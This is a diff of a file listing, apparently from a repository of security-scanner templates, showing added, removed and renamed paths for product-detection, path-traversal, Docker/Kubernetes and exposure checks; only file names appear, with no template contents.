@@ -44560,12 +44540,13 @@ ./poc/detect/mediawiki-version-detect.yaml ./poc/detect/megarac-sp-ui-detect.yaml ./poc/detect/meilisearch-detect.yaml -./poc/detect/metabase-detect-8804.yaml ./poc/detect/metabase-detect-8805.yaml ./poc/detect/metabase-detect.yaml ./poc/detect/mfiles-web-detect.yaml ./poc/detect/microsoft-echange-server-detect.yaml ./poc/detect/microsoft-exchange-server-detect-8852.yaml +./poc/detect/microsoft-exchange-server-detect-8853.yaml +./poc/detect/microsoft-exchange-server-detect-8854.yaml ./poc/detect/microsoft-exchange-server-detect.yaml ./poc/detect/microsoft-ftp-service-detect.yaml ./poc/detect/microstrategy-detect-1.yaml @@ -44598,23 +44579,25 @@ ./poc/detect/mitel-panel-detect.yaml ./poc/detect/mobileiron-version-detect.yaml ./poc/detect/moinmoin-detect-8915.yaml +./poc/detect/moinmoin-detect-8916.yaml ./poc/detect/moinmoin-detect-8917.yaml ./poc/detect/moinmoin-detect-8918.yaml ./poc/detect/moinmoin-detect.yaml ./poc/detect/mongodb-detect-8919.yaml +./poc/detect/mongodb-detect-8920.yaml ./poc/detect/mongodb-detect-8921.yaml ./poc/detect/mongodb-detect.yaml ./poc/detect/monstracms-detect.yaml ./poc/detect/moodle-version-detect.yaml +./poc/detect/moveit-detect.yaml ./poc/detect/moveit-sftp-detect.yaml -./poc/detect/moveit-transfer-detect.yaml ./poc/detect/mrtg-detect-1.yaml ./poc/detect/mrtg-detect-2.yaml ./poc/detect/mrtg-detect-3.yaml ./poc/detect/mrtg-detect-8958.yaml ./poc/detect/mrtg-detect-8959.yaml ./poc/detect/mrtg-detect.yaml -./poc/detect/ms-adcs-detect-8960.yaml +./poc/detect/ms-adcs-detect-8961.yaml ./poc/detect/ms-adcs-detect.yaml ./poc/detect/ms-sql-detect.yaml ./poc/detect/msmq-detect.yaml @@ -44627,6 +44610,7 @@ ./poc/detect/nacos-detect.yaml ./poc/detect/nameserver-detection.yaml ./poc/detect/neos-detect-9013.yaml +./poc/detect/neos-detect.yaml ./poc/detect/nessus-detect.yaml ./poc/detect/netdata-dashboard-detected-9022.yaml ./poc/detect/netdata-dashboard-detected.yaml 
@@ -44642,6 +44626,7 @@ ./poc/detect/nextcloud-detect-1.yaml ./poc/detect/nextcloud-detect-2.yaml ./poc/detect/nextcloud-detect-3.yaml +./poc/detect/nextcloud-detect-9079.yaml ./poc/detect/nextcloud-detect-9080.yaml ./poc/detect/nextcloud-detect-9081.yaml ./poc/detect/nextcloud-owncloud-detect.yaml @@ -44655,27 +44640,27 @@ ./poc/detect/node-red-detect-9138.yaml ./poc/detect/node-red-detect.yaml ./poc/detect/oauth2-detect-9180.yaml -./poc/detect/oauth2-detect-9181.yaml ./poc/detect/oauth2-detect-9182.yaml ./poc/detect/oauth2-detect-9183.yaml ./poc/detect/octobercms-detect-1.yaml ./poc/detect/octobercms-detect-2.yaml ./poc/detect/octobercms-detect-9194.yaml -./poc/detect/octobercms-detect-9195.yaml ./poc/detect/octobercms-detect-9196.yaml ./poc/detect/oidc-detect-9216.yaml ./poc/detect/oidc-detect-9218.yaml +./poc/detect/oidc-detect.yaml +./poc/detect/oipm-detect-9219.yaml ./poc/detect/oipm-detect-9220.yaml ./poc/detect/oipm-detect-9221.yaml -./poc/detect/oipm-detect-9222.yaml ./poc/detect/oipm-detect.yaml ./poc/detect/olivetti-crf-detect-9242.yaml ./poc/detect/olivetti-crf-detect-9243.yaml -./poc/detect/olivetti-crf-detect-9244.yaml ./poc/detect/oneblog-detect-9245.yaml +./poc/detect/oneblog-detect-9246.yaml ./poc/detect/oneblog-detect-9247.yaml ./poc/detect/open-virtualization-manager-detect-9325.yaml ./poc/detect/open-virtualization-manager-detect-9326.yaml +./poc/detect/open-virtualization-manager-detect.yaml ./poc/detect/openam-detect.yaml ./poc/detect/openam-detection-1.yaml ./poc/detect/openam-detection-10.yaml 
@@ -44699,14 +44684,13 @@ ./poc/detect/opencast-detect-9263.yaml ./poc/detect/opencast-detect-9264.yaml ./poc/detect/opencast-detect-9266.yaml -./poc/detect/openemr-detect-9271.yaml ./poc/detect/openemr-detect-9272.yaml ./poc/detect/openemr-detect-9273.yaml +./poc/detect/openemr-detect-9274.yaml ./poc/detect/openemr-detect.yaml ./poc/detect/opengear-detect.yaml ./poc/detect/opensis-detect-1.yaml ./poc/detect/opensis-detect-2.yaml -./poc/detect/opensis-detect-9313.yaml ./poc/detect/opensis-detect.yaml ./poc/detect/openssh-detect.yaml ./poc/detect/openssh-detect.yml 
@@ -44716,45 +44700,42 @@ ./poc/detect/openx-detect.yaml ./poc/detect/oracle-dbass-detect-9349.yaml ./poc/detect/oracle-dbass-detect-9350.yaml -./poc/detect/oracle-dbass-detect-9351.yaml -./poc/detect/oracle-dbass-detect.yaml ./poc/detect/owasp-juice-shop-detected-9414.yaml ./poc/detect/owasp-juice-shop-detected-9415.yaml +./poc/detect/owasp-juice-shop-detected-9416.yaml ./poc/detect/owasp-juice-shop-detected-9417.yaml -./poc/detect/owasp-juice-shop-detected-9418.yaml +./poc/detect/owasp-juice-shop-detected.yaml ./poc/detect/panel-detect.yaml ./poc/detect/parallels-hsphere-detect.yaml ./poc/detect/pega-detect-9473.yaml ./poc/detect/pega-detect-9474.yaml ./poc/detect/pega-detect-9475.yaml ./poc/detect/pega-detect-9476.yaml -./poc/detect/pega-detect.yaml ./poc/detect/pexip-detect.yaml ./poc/detect/pgsql-detect.yaml ./poc/detect/pgsql-version-detect.yaml ./poc/detect/php-proxy-detect-1.yaml ./poc/detect/php-proxy-detect-2.yaml ./poc/detect/php-proxy-detect-9544.yaml -./poc/detect/php-proxy-detect.yaml +./poc/detect/phpcollab-detect-9499.yaml ./poc/detect/phpcollab-detect-9500.yaml ./poc/detect/phpcollab-detect.yaml ./poc/detect/phpmyadmin-version-detect.yaml ./poc/detect/phpmyadmin-version-detection.yaml ./poc/detect/pi-hole-detect-9580.yaml -./poc/detect/pi-hole-detect-9581.yaml +./poc/detect/pi-hole-detect-9582.yaml ./poc/detect/pi-hole-detect-9583.yaml ./poc/detect/pi-hole-detect.yaml ./poc/detect/piwigo-detect.yaml ./poc/detect/plone-cms-detect-9605.yaml ./poc/detect/plone-cms-detect-9606.yaml -./poc/detect/plone-cms-detect-9607.yaml +./poc/detect/plone-cms-detect-9608.yaml ./poc/detect/plone-cms-detect-9609.yaml -./poc/detect/plone-cms-detect.yaml ./poc/detect/polycom-admin-detect-9624.yaml ./poc/detect/polycom-admin-detect.yaml ./poc/detect/pop3-detect.yaml ./poc/detect/ppdetect.yaml -./poc/detect/prestashop-detect.yaml +./poc/detect/prestashop-detect-9651.yaml ./poc/detect/privatebin-detect.yaml ./poc/detect/proftpd-server-detect.yaml 
./poc/detect/programming-language-detect.yaml @@ -44767,16 +44748,14 @@ ./poc/detect/prtg-detect-9703.yaml ./poc/detect/prtg-detect-9704.yaml ./poc/detect/prtg-detect-9705.yaml -./poc/detect/prtg-detect-9706.yaml ./poc/detect/prtg-detect.yaml ./poc/detect/prtg-version-detect.yaml ./poc/detect/pulse-secure-version-detect.yaml -./poc/detect/puppet-node-manager-detect-9720.yaml +./poc/detect/puppet-node-manager-detect.yaml ./poc/detect/puppetdb-detect-9717.yaml ./poc/detect/puppetdb-detect-9718.yaml ./poc/detect/puppetdb-detect-9719.yaml ./poc/detect/puppetserver-detect-9721.yaml -./poc/detect/puppetserver-detect-9722.yaml ./poc/detect/puppetserver-detect-9723.yaml ./poc/detect/qnap_nas_detect.yaml ./poc/detect/quantum-scalar-detect.yaml @@ -44797,6 +44776,7 @@ ./poc/detect/redis-honeypot-detection.yaml ./poc/detect/redmine-cli-detect-9852.yaml ./poc/detect/redmine-cli-detect-9853.yaml +./poc/detect/redmine-cli-detect-9854.yaml ./poc/detect/redmine-cli-detect-9855.yaml ./poc/detect/redmine-cli-detect-9856.yaml ./poc/detect/redmine-cli-detect.yaml @@ -44811,14 +44791,15 @@ ./poc/detect/reverse-proxy-detect.yaml ./poc/detect/rhymix-cms-detect-9876.yaml ./poc/detect/rhymix-cms-detect-9877.yaml +./poc/detect/rhymix-cms-detect-9878.yaml ./poc/detect/rhymix-cms-detect-9879.yaml ./poc/detect/riak-detect.yaml ./poc/detect/room-alert-detect.yaml ./poc/detect/routeros-version-detect.yaml ./poc/detect/rpcbind-portmapper-detect.yaml -./poc/detect/rseenet-detect-9916.yaml -./poc/detect/rstudio-detect-9917.yaml +./poc/detect/rseenet-detect.yaml ./poc/detect/rstudio-detect-9918.yaml +./poc/detect/rstudio-detect-9919.yaml ./poc/detect/rstudio-detect.yaml ./poc/detect/rsyncd-service-detect.yaml ./poc/detect/rtsp-detect.yaml 
@@ -44847,37 +44828,35 @@ ./poc/detect/sap-netweaver-detect-10043.yaml ./poc/detect/sap-netweaver-detect-10044.yaml ./poc/detect/sap-netweaver-detect-10046.yaml -./poc/detect/sap-netweaver-detect-10047.yaml ./poc/detect/sap-netweaver-detect-10048.yaml ./poc/detect/sap-netweaver-detect.yaml ./poc/detect/sap-recon-detect-10062.yaml -./poc/detect/sap-recon-detect-10063.yaml ./poc/detect/sap-recon-detect.yaml ./poc/detect/sap-successfactors-detect.yaml ./poc/detect/saprouter-detect.yaml ./poc/detect/sceditor-detect-10092.yaml +./poc/detect/sceditor-detect-10093.yaml ./poc/detect/sceditor-detect-10094.yaml ./poc/detect/schneider-electric-detect.yaml +./poc/detect/secmail-detect-10109.yaml ./poc/detect/secmail-detect-10110.yaml ./poc/detect/secmail-detect-10111.yaml -./poc/detect/secmail-detect-10112.yaml ./poc/detect/secmail-detect.yaml ./poc/detect/securityspy-detect-10119.yaml ./poc/detect/securityspy-detect-10120.yaml ./poc/detect/securityspy-detect.yaml ./poc/detect/seeddms-detect-10129.yaml ./poc/detect/seeddms-detect-10130.yaml +./poc/detect/seeddms-detect-10131.yaml ./poc/detect/seeddms-detect.yaml ./poc/detect/server-backup-manager-se-login-detect.yaml ./poc/detect/shiro-deserialization-detection.yaml ./poc/detect/shiro-detect-10195.yaml -./poc/detect/shiro-detect-10196.yaml ./poc/detect/shiro-detect-10197.yaml ./poc/detect/shopizer-detect-1.yaml ./poc/detect/shopizer-detect-2.yaml ./poc/detect/shopware-detect-1.yaml ./poc/detect/shopware-detect-10210.yaml -./poc/detect/shopware-detect-10211.yaml ./poc/detect/shopware-detect-10212.yaml ./poc/detect/shopware-detect-10213.yaml ./poc/detect/shopware-detect-2.yaml @@ -44887,7 +44866,6 @@ ./poc/detect/smartstore-detect-10332.yaml ./poc/detect/smartstore-detect-10333.yaml ./poc/detect/smartstore-detect-10334.yaml -./poc/detect/smartstore-detect.yaml ./poc/detect/smb-detect.yaml ./poc/detect/smb-os-detect.yaml ./poc/detect/smb-v1-detect.yaml 
@@ -44907,7 +44885,7 @@ ./poc/detect/solarwinds-whd-version-detect.yaml ./poc/detect/somansa-dlp-detect.yaml ./poc/detect/sonicwall-email-security-detect-10383.yaml -./poc/detect/sonicwall-email-security-detect.yaml +./poc/detect/sonicwall-email-security-detect-10384.yaml ./poc/detect/sonicwall-secure-mobile-access-version-detect.yaml ./poc/detect/sophos-fw-version-detect-1.yaml ./poc/detect/sophos-fw-version-detect-10396.yaml @@ -44936,9 +44914,9 @@ ./poc/detect/supermicro-ipmi-ui-detect.yaml ./poc/detect/supermicro-logo-detect.yaml ./poc/detect/symfony-detect.yaml -./poc/detect/tableau-server-detect.yaml +./poc/detect/tableau-server-detect-10643.yaml ./poc/detect/teamspeak3-detect.yaml -./poc/detect/tech-detect-10673.yaml +./poc/detect/tech-detect-10672.yaml ./poc/detect/tech-detect-10674.yaml ./poc/detect/tech-detect-10675.yaml ./poc/detect/tech-detect-10676.yaml @@ -44950,7 +44928,7 @@ ./poc/detect/telerik-dialoghandler-detect-10.yaml ./poc/detect/telerik-dialoghandler-detect-10687.yaml ./poc/detect/telerik-dialoghandler-detect-10688.yaml -./poc/detect/telerik-dialoghandler-detect-10690.yaml +./poc/detect/telerik-dialoghandler-detect-10691.yaml ./poc/detect/telerik-dialoghandler-detect-11.yaml ./poc/detect/telerik-dialoghandler-detect-12.yaml ./poc/detect/telerik-dialoghandler-detect-13.yaml @@ -44983,9 +44961,11 @@ ./poc/detect/tftp-detect.yaml ./poc/detect/thinkcmf-detection-10717.yaml ./poc/detect/thinkcmf-detection-10718.yaml +./poc/detect/thinkcmf-detection-10719.yaml ./poc/detect/thinkcmf-detection.yaml ./poc/detect/thinkphp-debug-detected.yaml ./poc/detect/thruk-detect.yaml +./poc/detect/tibco-spotfire-services-detect.yaml ./poc/detect/tingsboard-detect.yaml ./poc/detect/tomcat-detect-10792.yaml ./poc/detect/tomcat-detect-10793.yaml 
@@ -45004,7 +44984,7 @@ ./poc/detect/tyan-logo-detect.yaml ./poc/detect/tyan-rmm-ui-detect.yaml ./poc/detect/unauthorized-brother-access-detect.yaml -./poc/detect/unauthorized-puppet-node-manager-detect-10959.yaml +./poc/detect/unauthorized-puppet-node-manager-detect-10958.yaml ./poc/detect/unauthorized-puppet-node-manager-detect.yaml ./poc/detect/urls-detection.yaml ./poc/detect/vercel-detect.yaml @@ -45014,7 +44994,7 @@ ./poc/detect/versa-flexvnf-server-detect.yaml ./poc/detect/versa-flexvnf-ui-detect.yaml ./poc/detect/virtual-ema-detect-1.yaml -./poc/detect/virtual-ema-detect-11024.yaml +./poc/detect/virtual-ema-detect-11025.yaml ./poc/detect/virtual-ema-detect-2.yaml ./poc/detect/virtual-ema-detect.yaml ./poc/detect/vmware-airwatch-version-detect.yaml @@ -45023,17 +45003,17 @@ ./poc/detect/vmware-version-detect-11055.yaml ./poc/detect/vmware-version-detect.yaml ./poc/detect/vmware-vrealize-detect-11056.yaml -./poc/detect/vmware-vrealize-detect-11057.yaml ./poc/detect/vmware-vrealize-detect-11058.yaml +./poc/detect/vmware-vrealize-detect.yaml ./poc/detect/vnc-detect-11061.yaml ./poc/detect/vnc-detect.yaml ./poc/detect/vnc-service-detect.yaml ./poc/detect/voipmonitor-detect.yaml -./poc/detect/vsftpd-detection-11073.yaml ./poc/detect/vsftpd-detection-11074.yaml +./poc/detect/vsftpd-detection-11075.yaml ./poc/detect/vsftpd-detection-11076.yaml ./poc/detect/vsftpd-detection.yaml -./poc/detect/waf-detect-11086.yaml +./poc/detect/waf-detect-11087.yaml ./poc/detect/waf-detect-11088.yaml ./poc/detect/waf-detect-11089.yaml ./poc/detect/waf-detect-11090.yaml @@ -45045,6 +45025,7 @@ ./poc/detect/wamp-xdebug-detect-11101.yaml ./poc/detect/wamp-xdebug-detect-11102.yaml ./poc/detect/wamp-xdebug-detect-11103.yaml +./poc/detect/wamp-xdebug-detect-11104.yaml ./poc/detect/wamp-xdebug-detect.yaml ./poc/detect/wazuh-detect-11110.yaml ./poc/detect/wazuh-detect.yaml 
@@ -45053,11 +45034,10 @@ ./poc/detect/weave-scope-dashboard-detect.yaml ./poc/detect/web-framework-detect.yaml ./poc/detect/web-ftp-detect-11135.yaml -./poc/detect/web-ftp-detect-11136.yaml ./poc/detect/web-ftp-detect-11137.yaml ./poc/detect/web-ftp-detect-11138.yaml ./poc/detect/web-suite-detect-11167.yaml -./poc/detect/web-suite-detect.yaml +./poc/detect/web-suite-detect-11168.yaml ./poc/detect/webeditors-check-detect.yaml ./poc/detect/weblogic-bea_wls_internal-detect.yaml ./poc/detect/weblogic-detect-11142.yaml @@ -45069,7 +45049,7 @@ ./poc/detect/weblogic-iiop-detect-11148.yaml ./poc/detect/weblogic-iiop-detect.yaml ./poc/detect/weblogic-t3-detect-11151.yaml -./poc/detect/weblogic-t3-detect-11152.yaml +./poc/detect/weblogic-t3-detect-11153.yaml ./poc/detect/weblogic-t3-detect.yaml ./poc/detect/websphere-version-detect.yaml ./poc/detect/werkzeug-debugger-detect-11195.yaml @@ -45085,12 +45065,11 @@ ./poc/detect/widget-detector-elementor.yaml ./poc/detect/wing-ftp-detect.yaml ./poc/detect/wondercms-detect-11221.yaml +./poc/detect/wondercms-detect-11222.yaml ./poc/detect/wondercms-detect-11223.yaml -./poc/detect/wondercms-detect.yaml -./poc/detect/wordpress-detect-11261.yaml +./poc/detect/wordpress-detect-11260.yaml ./poc/detect/wordpress-detect.yaml ./poc/detect/wordpress-detect2.yaml -./poc/detect/wordpress-gotmls-detect-11280.yaml ./poc/detect/wordpress-gotmls-detect-11281.yaml ./poc/detect/wordpress-gotmls-detect.yaml ./poc/detect/wordpress-plugins-detect-11296.yaml 
@@ -45102,11 +45081,9 @@ ./poc/detect/wordpress-themes-detect.yaml ./poc/detect/wordpress-website-detect.yaml ./poc/detect/worksites-detection-11383.yaml -./poc/detect/worksites-detection-11384.yaml ./poc/detect/worksites-detection-11385.yaml ./poc/detect/worksites-detection-11386.yaml ./poc/detect/workspaceone-uem-airwatch-dashboard-detect.yaml -./poc/detect/wowza-streaming-detect.yaml ./poc/detect/wp-admin-detect.yaml ./poc/detect/wp-detect.yaml ./poc/detect/wp-mobile-detector-291130449baacf0e6d1046f164f908e9.yaml @@ -45126,12 +45103,13 @@ ./poc/detect/ws_ftp-ssh-detect.yaml ./poc/detect/wsdl-detect.yaml ./poc/detect/wso2-apimanager-detect-11637.yaml -./poc/detect/wso2-apimanager-detect-11638.yaml ./poc/detect/wso2-apimanager-detect-11639.yaml ./poc/detect/wso2-apimanager-detect.yaml ./poc/detect/wuzhicms-detect-11652.yaml ./poc/detect/wuzhicms-detect-11653.yaml +./poc/detect/wuzhicms-detect-11654.yaml ./poc/detect/wuzhicms-detect-11655.yaml +./poc/detect/wuzhicms-detect.yaml ./poc/detect/xlight-ftp-service-detect.yaml ./poc/detect/xml-schema-detect-11692.yaml ./poc/detect/xml-schema-detect.yaml @@ -45142,13 +45120,14 @@ ./poc/detect/yapi-detect-11722.yaml ./poc/detect/yellowfin-bi-version-detect.yaml ./poc/detect/yongyou-nc-beanshell-detect.yaml +./poc/detect/yourls-detect.yaml ./poc/detect/yzmcms-detect-11751.yaml ./poc/detect/yzmcms-detect-11752.yaml ./poc/detect/yzmcms-detect.yaml ./poc/detect/zabbix-version-detect.yaml ./poc/detect/zebra-printer-detect.yaml +./poc/detect/zentao-detect-11785.yaml ./poc/detect/zentao-detect-11786.yaml -./poc/detect/zentao-detect-11787.yaml ./poc/detect/zentao-detect.yaml ./poc/detect/zentral-detection.yaml ./poc/detect/zentral-detection.yml 
@@ -45185,11 +45164,10 @@ ./poc/directory_listing/ecology-filedownload-directory-traversal.yml ./poc/directory_listing/ecology-jqueryfiletree-directory-traversal.yaml ./poc/directory_listing/ecology-springframework-directory-traversal-7174.yaml -./poc/directory_listing/ecology-springframework-directory-traversal-7175.yaml +./poc/directory_listing/ecology-springframework-directory-traversal.yaml ./poc/directory_listing/ecology-springframework-directory-traversal.yml ./poc/directory_listing/ecology-springframework-directoryTraversal.yaml -./poc/directory_listing/elFinder-path-traversal.yaml -./poc/directory_listing/elfinder-path-traversal-7203.yaml +./poc/directory_listing/elfinder-path-traversal.yaml ./poc/directory_listing/erp-nc-directory-traversal-7245.yaml ./poc/directory_listing/erp-nc-directory-traversal-7246.yaml ./poc/directory_listing/erp-nc-directory-traversal-7247.yaml @@ -45218,12 +45196,11 @@ ./poc/directory_listing/kingdee-eas-DirectoryTraversal.yaml ./poc/directory_listing/kingdee-eas-directory-traversal-8488.yaml ./poc/directory_listing/kingdee-eas-directory-traversal-8489.yaml -./poc/directory_listing/kingdee-eas-directory-traversal.yaml ./poc/directory_listing/kingdee-eas-directory-traversal.yml ./poc/directory_listing/natshell-path-traversal-9005.yaml +./poc/directory_listing/natshell-path-traversal-9006.yaml ./poc/directory_listing/natshell-path-traversal-9007.yaml ./poc/directory_listing/natshell-path-traversal-9008.yaml -./poc/directory_listing/natshell-path-traversal.yaml ./poc/directory_listing/netmizer-log-management-data-directory-traversal.yaml ./poc/directory_listing/nexusdb-cve-2020-24571-path-traversal.yml ./poc/directory_listing/nginx-merge-slashes-path-traversal-1.yaml 
@@ -45236,8 +45213,6 @@ ./poc/directory_listing/oa-tongda-path-traversal-9175.yaml ./poc/directory_listing/oa-tongda-path-traversal-9176.yaml ./poc/directory_listing/oa-tongda-path-traversal-9177.yaml -./poc/directory_listing/oa-tongda-path-traversal-9178.yaml -./poc/directory_listing/oa-tongda-path-traversal-9179.yaml ./poc/directory_listing/oa-tongda-path-traversal.yaml ./poc/directory_listing/path-traversal-exposure.yaml ./poc/directory_listing/path-traversal.yaml @@ -45248,16 +45223,17 @@ ./poc/directory_listing/pmb-directory-traversal-9612.yaml ./poc/directory_listing/pmb-directory-traversal-9613.yaml ./poc/directory_listing/pmb-directory-traversal-9614.yaml +./poc/directory_listing/pmb-directory-traversal.yaml +./poc/directory_listing/tpshop-directory-traversal-10821.yaml ./poc/directory_listing/tpshop-directory-traversal-10822.yaml -./poc/directory_listing/tpshop-directory-traversal-10823.yaml +./poc/directory_listing/tpshop-directory-traversal.yaml ./poc/directory_listing/tpshop-directory-traversal.yml ./poc/directory_listing/weiphp-path-traversal.yaml ./poc/directory_listing/weiphp-path-traversal.yml ./poc/directory_listing/wooyun-path-traversal-11229.yaml +./poc/directory_listing/wooyun-path-traversal-11230.yaml ./poc/directory_listing/wooyun-path-traversal-11231.yaml -./poc/directory_listing/wooyun-path-traversal-11232.yaml ./poc/directory_listing/wooyun-path-traversal-11233.yaml -./poc/directory_listing/wooyun-path-traversal.yaml ./poc/directory_listing/wordpress-duplicator-path-traversal.yaml ./poc/directory_listing/wp-duplicator-path-traversal.yaml ./poc/directory_listing/yongyou-fe-templateoftaohong-manager-path-traversal.yaml 
@@ -45266,12 +45242,10 @@ ./poc/directory_listing/zeit-nodejs-cve-2020-5284-directory-traversal.yml ./poc/docker/Kubernetes-unauth.yaml ./poc/docker/amazon-docker-config-279.yaml -./poc/docker/amazon-docker-config-280.yaml -./poc/docker/amazon-docker-config-disclosure-278.yaml ./poc/docker/amazon-docker-config-disclosure.yaml +./poc/docker/amazon-docker-config.yaml ./poc/docker/aws-ecs-container-agent-tasks-639.yaml ./poc/docker/aws-ecs-container-agent-tasks-640.yaml -./poc/docker/aws-ecs-container-agent-tasks-641.yaml ./poc/docker/aws-ecs-container-agent-tasks.yaml ./poc/docker/container-registry-exposure.yaml ./poc/docker/docker-api-detection.yaml @@ -45288,7 +45262,7 @@ ./poc/docker/docker-compose-config-7.yaml ./poc/docker/docker-compose-config-7057.yaml ./poc/docker/docker-compose-config-7058.yaml -./poc/docker/docker-compose-config-7059.yaml +./poc/docker/docker-compose-config.yaml ./poc/docker/docker-compose-config.yml ./poc/docker/docker-compose.debug.yml ./poc/docker/docker-compose.yaml @@ -45301,7 +45275,6 @@ ./poc/docker/docker-registry-7065.yaml ./poc/docker/docker-registry-7066.yaml ./poc/docker/docker-registry-7067.yaml -./poc/docker/docker-registry-7068.yaml ./poc/docker/docker-registry-api-unauth.yaml ./poc/docker/docker-registry-api-unauth.yml ./poc/docker/docker-registry.yaml @@ -45310,13 +45283,12 @@ ./poc/docker/dockercfg-config-1.yaml ./poc/docker/dockercfg-config-2.yaml ./poc/docker/dockercfg-config-7056.yaml -./poc/docker/dockercfg-config.yaml ./poc/docker/dockercfg.yaml ./poc/docker/dockerfile-disclosure.yaml ./poc/docker/dockerfile-hidden-disclosure-1.yaml ./poc/docker/dockerfile-hidden-disclosure-2.yaml +./poc/docker/dockerfile-hidden-disclosure-7061.yaml ./poc/docker/dockerfile-hidden-disclosure-7062.yaml -./poc/docker/dockerfile-hidden-disclosure-7063.yaml ./poc/docker/dockerfile-hidden-disclosure.yaml ./poc/docker/dockerrun-aws-config-page.yaml ./poc/docker/dynamic-container-host.yaml 
@@ -45330,18 +45302,16 @@ ./poc/docker/kubernetes-dashboard-8526.yaml ./poc/docker/kubernetes-dashboard.yaml ./poc/docker/kubernetes-enterprise-manager-8527.yaml -./poc/docker/kubernetes-enterprise-manager-8529.yaml +./poc/docker/kubernetes-enterprise-manager-8528.yaml ./poc/docker/kubernetes-enterprise-manager-8530.yaml ./poc/docker/kubernetes-enterprise-manager.yaml ./poc/docker/kubernetes-etcd-keys.yaml ./poc/docker/kubernetes-fake-certificate.yaml ./poc/docker/kubernetes-kustomization-disclosure-8531.yaml ./poc/docker/kubernetes-kustomization-disclosure-8532.yaml -./poc/docker/kubernetes-kustomization-disclosure.yaml ./poc/docker/kubernetes-metrics-8534.yaml ./poc/docker/kubernetes-metrics-8535.yaml ./poc/docker/kubernetes-metrics-8536.yaml -./poc/docker/kubernetes-metrics.yaml ./poc/docker/kubernetes-mirantis-8537.yaml ./poc/docker/kubernetes-mirantis-8538.yaml ./poc/docker/kubernetes-mirantis-8539.yaml 
@@ -45349,23 +45319,23 @@ ./poc/docker/kubernetes-mirantis.yaml ./poc/docker/kubernetes-pods-1.yaml ./poc/docker/kubernetes-pods-2.yaml -./poc/docker/kubernetes-pods-8543.yaml +./poc/docker/kubernetes-pods-8542.yaml ./poc/docker/kubernetes-pods-8544.yaml ./poc/docker/kubernetes-pods-8546.yaml ./poc/docker/kubernetes-pods-api.yaml ./poc/docker/kubernetes-pods.yaml ./poc/docker/kubernetes-resource-report-8547.yaml ./poc/docker/kubernetes-resource-report-8548.yaml -./poc/docker/kubernetes-unauth.yaml +./poc/docker/kubernetes-unauth(1).yaml ./poc/docker/kubernetes-unauth.yml ./poc/docker/kubernetes-version-8550.yaml ./poc/docker/kubernetes-version-8551.yaml +./poc/docker/kubernetes-version-8552.yaml ./poc/docker/kubernetes-version-8553.yaml -./poc/docker/kubernetes-version.yaml ./poc/docker/kubernetes-web-view.yaml ./poc/docker/kubernetes.yaml +./poc/docker/misconfigured-docker-8900.yaml ./poc/docker/misconfigured-docker-8901.yaml -./poc/docker/misconfigured-docker-8902.yaml ./poc/docker/misconfigured-docker.yaml ./poc/docker/oracle-containers-panel.yaml ./poc/drupal/drupal-7-elfinder.yaml @@ -45373,7 +45343,6 @@ ./poc/drupal/drupal-cve-2018-7600-rce.yml ./poc/drupal/drupal-cve-2019-6340.yml ./poc/drupal/drupal-full-path-disclosure.yaml -./poc/drupal/drupal-install-7105.yaml ./poc/drupal/drupal-install-7106.yaml ./poc/drupal/drupal-install-7108.yaml ./poc/drupal/drupal-install.yaml @@ -45385,7 +45354,6 @@ ./poc/drupal/drupal-user-enum-ajax-3.yaml ./poc/drupal/drupal-user-enum-ajax-4.yaml ./poc/drupal/drupal-user-enum-ajax-7109.yaml -./poc/drupal/drupal-user-enum-ajax-7111.yaml ./poc/drupal/drupal-user-enum-ajax.yaml ./poc/drupal/drupal-user-enum-redirect-1.yaml ./poc/drupal/drupal-user-enum-redirect-2.yaml 
@@ -45759,6 +45727,7 @@ ./poc/elk/elasticsearch-insecure-default-config.yaml ./poc/elk/elasticsearch-log4j.yaml ./poc/elk/elasticsearch-sql-client-detect-7189.yaml +./poc/elk/elasticsearch-sql-client-detect-7190.yaml ./poc/elk/elasticsearch-sql-client-detect-7191.yaml ./poc/elk/elasticsearch-sql-client-detect-7192.yaml ./poc/elk/elasticsearch-unauth.yaml @@ -45776,9 +45745,9 @@ ./poc/elk/kibana-detect-1.yaml ./poc/elk/kibana-detect-2.yaml ./poc/elk/kibana-detect-3.yaml -./poc/elk/kibana-detect-8484.yaml +./poc/elk/kibana-detect-8483.yaml ./poc/elk/kibana-detect.yaml -./poc/elk/kibana-panel-8486.yaml +./poc/elk/kibana-panel-8485.yaml ./poc/elk/kibana-panel-8487.yaml ./poc/elk/kibana-panel.yaml ./poc/elk/kibana-unauth.yaml @@ -45821,20 +45790,18 @@ ./poc/exposed/active-admin-exposure-39.yaml ./poc/exposed/active-admin-exposure-40.yaml ./poc/exposed/active-admin-exposure-41.yaml -./poc/exposed/active-admin-exposure-42.yaml +./poc/exposed/active-admin-exposure-43.yaml ./poc/exposed/active-admin-exposure.yaml ./poc/exposed/activemq-path-disclosure.yaml -./poc/exposed/adobe-connect-username-exposure-100.yaml ./poc/exposed/adobe-connect-username-exposure-101.yaml ./poc/exposed/adobe-connect-username-exposure-98.yaml ./poc/exposed/adobe-connect-username-exposure-99.yaml ./poc/exposed/adobe-connect-username-exposure.yaml ./poc/exposed/airflow-api-exposure.yaml ./poc/exposed/airflow-configuration-exposure-229.yaml -./poc/exposed/airflow-configuration-exposure.yaml +./poc/exposed/airflow-configuration-exposure-230.yaml ./poc/exposed/airflow-exposure.yaml ./poc/exposed/allied-telesis-exposure.yaml -./poc/exposed/amazon-docker-config-disclosure-278.yaml ./poc/exposed/amazon-docker-config-disclosure.yaml ./poc/exposed/amazon-sns-topic-disclosure-detect.yaml ./poc/exposed/ambari-exposure-291.yaml 
@@ -45845,11 +45812,11 @@ ./poc/exposed/ampache-update-exposure.yaml ./poc/exposed/android-debug-database-exposed-312.yaml ./poc/exposed/android-debug-database-exposed-313.yaml +./poc/exposed/android-debug-database-exposed-314.yaml ./poc/exposed/android-debug-database-exposed-315.yaml -./poc/exposed/android-debug-database-exposed-316.yaml ./poc/exposed/android-debug-database-exposed.yaml ./poc/exposed/ansible-config-disclosure-325.yaml -./poc/exposed/ansible-config-disclosure.yaml +./poc/exposed/ansible-config-disclosure-326.yaml ./poc/exposed/ansible-tower-exposure-329.yaml ./poc/exposed/ansible-tower-exposure-330.yaml ./poc/exposed/ansible-tower-exposure-332.yaml @@ -45868,6 +45835,7 @@ ./poc/exposed/appspec-yml-disclosure-2.yaml ./poc/exposed/appspec-yml-disclosure-527.yaml ./poc/exposed/appspec-yml-disclosure-528.yaml +./poc/exposed/appspec-yml-disclosure-529.yaml ./poc/exposed/aspnetmvc-version-disclosure.yaml ./poc/exposed/atlassian-jira-info-disclosure.yaml ./poc/exposed/atom-sync-exposure.yaml @@ -45878,8 +45846,8 @@ 